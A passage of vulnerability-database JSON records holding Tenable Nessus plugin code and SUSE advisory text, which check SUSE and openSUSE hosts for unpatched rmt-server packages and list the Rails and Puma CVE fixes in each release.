script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Rails File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-pubcloud\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"rmt-server-2.6.5-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"rmt-server-config-2.6.5-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"rmt-server-debuginfo-2.6.5-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"rmt-server-debugsource-2.6.5-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"rmt-server-pubcloud-2.6.5-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rmt-server / rmt-server-config / rmt-server-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:35", "description": "This update for rmt-server fixes the following issues :\n\nVersion 2.6.5\n\nSolved potential bug of SCC repository URLs changing over time. RMT now self heals by removing the previous invalid repository and creating the correct one.\n\nVersion 2.6.4\n\nAdd web server settings to /etc/rmt.conf: Now it's possible to configure the minimum and maximum threads count as well the number of web server workers to be booted through /etc/rmt.conf.\n\nVersion 2.6.3\n\nInstead of using an MD5 of URLs for custom repository friendly_ids, RMT now builds an ID from the name.\n\nVersion 2.6.2\n\nFix RMT file caching based on timestamps: Previously, RMT sent GET requests with the header 'If-Modified-Since' to a repository server and if the response had a 304 (Not Modified), it would copy a file from the local cache instead of downloading. However, if the local file timestamp accidentally changed to a date newer than the one on the repository server, RMT would have an outdated file, which caused some errors. Now, RMT makes HEAD requests to the repositories servers and inspect the 'Last-Modified' header to decide whether to download a file or copy it from cache, by comparing the equalness of timestamps.\n\nVersion 2.6.1\n\nFixed an issue where relative paths supplied to `rmt-cli import repos` caused the command to fail.\n\nVersion 2.6.0\n\nFriendlier IDs for custom repositories: In an effort to simplify the handling of SCC and custom repositories, RMT now has friendly IDs. For SCC repositories, it's the same SCC ID as before. For custom repositories, it can either be user provided or RMT generated (MD5 of the provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom repositories.\n\n - Custom repository IDs can be the same across RMT instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than before. RMT still supports that old ID, but it's recommended to start using the new ID to ensure future compatibility.\n\nVersion 2.5.20\n\nUpdated rails from 6.0.3.2 to 6.0.3.3 :\n\n - actionview (CVE-2020-15169)\n\nVersion 2.5.19\n\nRMT now has the ability to remove local systems with the command `rmt-cli systems remove`.\n\nVersion 2.5.18\n\nFixed exit code for `rmt-cli mirror` and its subcommands. Now it exits with 1 whenever an error occurrs during mirroring\n\nImproved message logging for `rtm-cli mirror`. Instead of logging an error when it occurs, the command summarize all errors at the end of execution. Now log messages have colors to better identify failure/success.\n\nVersion 2.5.17\n\nRMT no longer provides the installer updates repository to systems via its zypper service. This repository is used during the installation process, as it provides an up-to-date installation experience, but it has no use on an already installed system.\n\nVersion 2.5.16\n\nUpdated RMT's rails and puma dependencies.\n\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249, CVE-2020-5247 CVE-2019-16770)\n\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418, CVE-2019-5419)\n\n - activesupport (CVE-2020-8165)\n\n - railties (CVE-2019-5420)\n\nVersion 2.5.15\n\nRMT now checks if repositories are fully mirrored during the activation process. Previously, RMT only checked if the repositories were enabled to be mirrored, but not that they were actually mirrored.\nIn this case, RMTs were not able to provide the repository data which systems assumed it had.\n\nVersion 2.5.14\n\nEnable 'Installer-Updates' repositories by default\n\nFixed deprecation warning when thor encountered an error. Also, instead of returning 0 for thor errors, rmt-cli will return 1 instead.\n\nVersion 2.5.13\n\nAdded `rmt-cli repos clean` command to remove locally mirrored files of repositories which are not marked to be mirrored.\n\nPreviously, RMT didn't track deduplicated files in its database. Now, to accommodate `rmt-cli repos clean`, RMT will track all mirrored files.\n\nMove the nginx reload to the configuration package which contain nginx config files, don't reload nginx unconditionally from main package.\n\nVersion 2.5.12\n\nUpdate rack to version 2.2.3 (CVE-2020-8184: bsc#1173351)\n\nUpdate Rails to version 5.2.4.3 :\n\n - actionpack (CVE-2020-8164: bsc#1172177)\n\n - actionpack (CVE-2020-8166: bsc#1172182)\n\n - activesupport (CVE-2020-8165: bsc#1172186)\n\n - actionview (CVE-2020-8167: bsc#1172184)\n\nVersion 2.5.11\n\nrmt-server-pubcloud :\n\n - SLES11 EOL\n\n - Extension activation verification based on the available subscriptions\n\n - Added a manual instance verification script\n\nVersion 2.5.10\n\nSupport rmt-server to run with Ruby 2.7 (Factory/Tumbleweed) :\n\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix incompatibility Ruby 2.7 OpenStruct class;\n\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order to also bump gem 'ethon' version, which caused a 'rb_safe_level' warning on Ruby 2.7;\n\n - Fix 'last arg as keyword arg' Ruby 2.7 warning on source code;\n\n - Disable 'deprecated' warnings from Ruby 2.7; Rails 5.1 generates a lot of warnings with Ruby 2.7, mainly due to 'capturing the given block with Proc.new', which is deprecated;\n\n - Improve RPM spec to consider only the distribution default Ruby version configured in OBS;\n\n - Improve RPM spec to remove Ruby 2.7 warnings regarding 'bundler.\n\nMove nginx/vhosts.d directory to correct sub-package. They are needed together with nginx, not rmt-server.\n\nFix dependencies especially for containerized usage :\n\n - mariadb and nginx are not hard requires, could run on another host\n\nFix generic dependencies :\n\n - systemd ordering was missing\n\n - shadow is required for pre-install\n\nVersion 2.5.9\n\nrmt-server-pubcloud: enforce strict authentication\n\nVersion 2.5.8\n\nUse repomd_parser gem to remove repository metadata parsing code.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : rmt-server (SUSE-SU-2020:3147-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rmt-server", "p-cpe:/a:novell:suse_linux:rmt-server-config", "p-cpe:/a:novell:suse_linux:rmt-server-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-3147-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143622", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3147-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143622);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/17\");\n\n script_cve_id(\"CVE-2019-16770\", \"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\", \"CVE-2020-11076\", \"CVE-2020-11077\", \"CVE-2020-15169\", \"CVE-2020-5247\", \"CVE-2020-5249\", \"CVE-2020-5267\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\", \"CVE-2020-8184\", \"CVE-2020-8185\");\n\n script_name(english:\"SUSE SLES15 Security Update : rmt-server (SUSE-SU-2020:3147-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rmt-server fixes the following issues :\n\nVersion 2.6.5\n\nSolved potential bug of SCC repository URLs changing over time. RMT\nnow self heals by removing the previous invalid repository and\ncreating the correct one.\n\nVersion 2.6.4\n\nAdd web server settings to /etc/rmt.conf: Now it's possible to\nconfigure the minimum and maximum threads count as well the number of\nweb server workers to be booted through /etc/rmt.conf.\n\nVersion 2.6.3\n\nInstead of using an MD5 of URLs for custom repository friendly_ids,\nRMT now builds an ID from the name.\n\nVersion 2.6.2\n\nFix RMT file caching based on timestamps: Previously, RMT sent GET\nrequests with the header 'If-Modified-Since' to a repository server\nand if the response had a 304 (Not Modified), it would copy a file\nfrom the local cache instead of downloading. However, if the local\nfile timestamp accidentally changed to a date newer than the one on\nthe repository server, RMT would have an outdated file, which caused\nsome errors. Now, RMT makes HEAD requests to the repositories servers\nand inspect the 'Last-Modified' header to decide whether to download a\nfile or copy it from cache, by comparing the equalness of timestamps.\n\nVersion 2.6.1\n\nFixed an issue where relative paths supplied to `rmt-cli import repos`\ncaused the command to fail.\n\nVersion 2.6.0\n\nFriendlier IDs for custom repositories: In an effort to simplify the\nhandling of SCC and custom repositories, RMT now has friendly IDs. For\nSCC repositories, it's the same SCC ID as before. For custom\nrepositories, it can either be user provided or RMT generated (MD5 of\nthe provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom\n repositories.\n\n - Custom repository IDs can be the same across RMT\n instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than\n before. RMT still supports that old ID, but it's\n recommended to start using the new ID to ensure future\n compatibility.\n\nVersion 2.5.20\n\nUpdated rails from 6.0.3.2 to 6.0.3.3 :\n\n - actionview (CVE-2020-15169)\n\nVersion 2.5.19\n\nRMT now has the ability to remove local systems with the command\n`rmt-cli systems remove`.\n\nVersion 2.5.18\n\nFixed exit code for `rmt-cli mirror` and its subcommands. Now it exits\nwith 1 whenever an error occurrs during mirroring\n\nImproved message logging for `rtm-cli mirror`. Instead of logging an\nerror when it occurs, the command summarize all errors at the end of\nexecution. Now log messages have colors to better identify\nfailure/success.\n\nVersion 2.5.17\n\nRMT no longer provides the installer updates repository to systems via\nits zypper service. This repository is used during the installation\nprocess, as it provides an up-to-date installation experience, but it\nhas no use on an already installed system.\n\nVersion 2.5.16\n\nUpdated RMT's rails and puma dependencies.\n\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249,\n CVE-2020-5247 CVE-2019-16770)\n\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418,\n CVE-2019-5419)\n\n - activesupport (CVE-2020-8165)\n\n - railties (CVE-2019-5420)\n\nVersion 2.5.15\n\nRMT now checks if repositories are fully mirrored during the\nactivation process. Previously, RMT only checked if the repositories\nwere enabled to be mirrored, but not that they were actually mirrored.\nIn this case, RMTs were not able to provide the repository data which\nsystems assumed it had.\n\nVersion 2.5.14\n\nEnable 'Installer-Updates' repositories by default\n\nFixed deprecation warning when thor encountered an error. Also,\ninstead of returning 0 for thor errors, rmt-cli will return 1 instead.\n\nVersion 2.5.13\n\nAdded `rmt-cli repos clean` command to remove locally mirrored files\nof repositories which are not marked to be mirrored.\n\nPreviously, RMT didn't track deduplicated files in its database. Now,\nto accommodate `rmt-cli repos clean`, RMT will track all mirrored\nfiles.\n\nMove the nginx reload to the configuration package which contain nginx\nconfig files, don't reload nginx unconditionally from main package.\n\nVersion 2.5.12\n\nUpdate rack to version 2.2.3 (CVE-2020-8184: bsc#1173351)\n\nUpdate Rails to version 5.2.4.3 :\n\n - actionpack (CVE-2020-8164: bsc#1172177)\n\n - actionpack (CVE-2020-8166: bsc#1172182)\n\n - activesupport (CVE-2020-8165: bsc#1172186)\n\n - actionview (CVE-2020-8167: bsc#1172184)\n\nVersion 2.5.11\n\nrmt-server-pubcloud :\n\n - SLES11 EOL\n\n - Extension activation verification based on the available\n subscriptions\n\n - Added a manual instance verification script\n\nVersion 2.5.10\n\nSupport rmt-server to run with Ruby 2.7 (Factory/Tumbleweed) :\n\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix\n incompatibility Ruby 2.7 OpenStruct class;\n\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order\n to also bump gem 'ethon' version, which caused a\n 'rb_safe_level' warning on Ruby 2.7;\n\n - Fix 'last arg as keyword arg' Ruby 2.7 warning on source\n code;\n\n - Disable 'deprecated' warnings from Ruby 2.7; Rails 5.1\n generates a lot of warnings with Ruby 2.7, mainly due to\n 'capturing the given block with Proc.new', which is\n deprecated;\n\n - Improve RPM spec to consider only the distribution\n default Ruby version configured in OBS;\n\n - Improve RPM spec to remove Ruby 2.7 warnings regarding\n 'bundler.\n\nMove nginx/vhosts.d directory to correct sub-package. They are needed\ntogether with nginx, not rmt-server.\n\nFix dependencies especially for containerized usage :\n\n - mariadb and nginx are not hard requires, could run on\n another host\n\nFix generic dependencies :\n\n - systemd ordering was missing\n\n - shadow is required for pre-install\n\nVersion 2.5.9\n\nrmt-server-pubcloud: enforce strict authentication\n\nVersion 2.5.8\n\nUse repomd_parser gem to remove repository metadata parsing code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-16770/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5418/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5419/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11076/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11077/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-15169/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5247/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5249/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5267/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8164/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8185/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203147-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f3122c55\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-3147=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-3147=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-3147=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-3147=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Rails File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"rmt-server-2.6.5-3.34.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"rmt-server-config-2.6.5-3.34.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"rmt-server-debuginfo-2.6.5-3.34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rmt-server\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:48", "description": "This update for rmt-server fixes the following issues :\n\nVersion 2.6.5\n\nSolved potential bug of SCC repository URLs changing over time. RMT now self heals by removing the previous invalid repository and creating the correct one.\n\nVersion 2.6.4\n\nAdd web server settings to /etc/rmt.conf: Now it's possible to configure the minimum and maximum threads count as well the number of web server workers to be booted through /etc/rmt.conf.\n\nVersion 2.6.3\n\nInstead of using an MD5 of URLs for custom repository friendly_ids, RMT now builds an ID from the name.\n\nVersion 2.6.2\n\nFix RMT file caching based on timestamps: Previously, RMT sent GET requests with the header 'If-Modified-Since' to a repository server and if the response had a 304 (Not Modified), it would copy a file from the local cache instead of downloading. However, if the local file timestamp accidentally changed to a date newer than the one on the repository server, RMT would have an outdated file, which caused some errors. Now, RMT makes HEAD requests to the repositories servers and inspect the 'Last-Modified' header to decide whether to download a file or copy it from cache, by comparing the equalness of timestamps.\n\nVersion 2.6.1\n\nFixed an issue where relative paths supplied to `rmt-cli import repos` caused the command to fail.\n\nVersion 2.6.0\n\nFriendlier IDs for custom repositories: In an effort to simplify the handling of SCC and custom repositories, RMT now has friendly IDs. For SCC repositories, it's the same SCC ID as before. For custom repositories, it can either be user provided or RMT generated (MD5 of the provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom repositories.\n\n - Custom repository IDs can be the same across RMT instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than before. RMT still supports that old ID, but it's recommended to start using the new ID to ensure future compatibility.\n\nVersion 2.5.20\n\nUpdated rails from 6.0.3.2 to 6.0.3.3 :\n\n - actionview (CVE-2020-15169)\n\nVersion 2.5.19\n\nRMT now has the ability to remove local systems with the command `rmt-cli systems remove`.\n\nVersion 2.5.18\n\nFixed exit code for `rmt-cli mirror` and its subcommands. Now it exits with 1 whenever an error occurs during mirroring\n\nImproved message logging for `rtm-cli mirror`. Instead of logging an error when it occurs, the command summarize all errors at the end of execution. Now log messages have colors to better identify failure/success.\n\nVersion 2.5.17\n\nRMT no longer provides the installer updates repository to systems via its zypper service. This repository is used during the installation process, as it provides an up-to-date installation experience, but it has no use on an already installed system.\n\nVersion 2.5.16\n\nUpdated RMT's rails and puma dependencies.\n\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249, CVE-2020-5247 CVE-2019-16770)\n\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418, CVE-2019-5419)\n\n - activesupport (CVE-2020-8165)\n\n - railties (CVE-2019-5420)\n\nVersion 2.5.15\n\nRMT now checks if repositories are fully mirrored during the activation process. Previously, RMT only checked if the repositories were enabled to be mirrored, but not that they were actually mirrored.\nIn this case, RMTs were not able to provide the repository data which systems assumed it had.\n\nVersion 2.5.14\n\nEnable 'Installer-Updates' repositories by default\n\nFixed deprecation warning when thor encountered an error. Also, instead of returning 0 for thor errors, rmt-cli will return 1 instead.\n\nVersion 2.5.13\n\nAdded `rmt-cli repos clean` command to remove locally mirrored files of repositories which are not marked to be mirrored.\n\nPreviously, RMT didn't track deduplicated files in its database. Now, to accommodate `rmt-cli repos clean`, RMT will track all mirrored files.\n\nMove the nginx reload to the configuration package which contain nginx config files, don't reload nginx unconditionally from main package.\n\nVersion 2.5.12\n\nUpdate rack to version 2.2.3 (CVE-2020-8184: bsc#1173351)\n\nUpdate Rails to version 5.2.4.3 :\n\n - actionpack (CVE-2020-8164: bsc#1172177)\n\n - actionpack (CVE-2020-8166: bsc#1172182)\n\n - activesupport (CVE-2020-8165: bsc#1172186)\n\n - actionview (CVE-2020-8167: bsc#1172184)\n\nVersion 2.5.11\n\nrmt-server-pubcloud :\n\n - SLES11 EOL\n\n - Extension activation verification based on the available subscriptions\n\n - Added a manual instance verification script\n\nVersion 2.5.10\n\nSupport rmt-server to run with Ruby 2.7 (Factory/Tumbleweed) :\n\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix incompatibility Ruby 2.7 OpenStruct class;\n\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order to also bump gem 'ethon' version, which caused a 'rb_safe_level' warning on Ruby 2.7;\n\n - Fix 'last arg as keyword arg' Ruby 2.7 warning on source code;\n\n - Disable 'deprecated' warnings from Ruby 2.7; Rails 5.1 generates a lot of warnings with Ruby 2.7, mainly due to 'capturing the given block with Proc.new', which is deprecated;\n\n - Improve RPM spec to consider only the distribution default Ruby version configured in OBS;\n\n - Improve RPM spec to remove Ruby 2.7 warnings regarding 'bundler.\n\nMove nginx/vhosts.d directory to correct sub-package. They are needed together with nginx, not rmt-server.\n\nFix dependencies especially for containerized usage :\n\n - mariadb and nginx are not hard requires, could run on another host\n\nFix generic dependencies 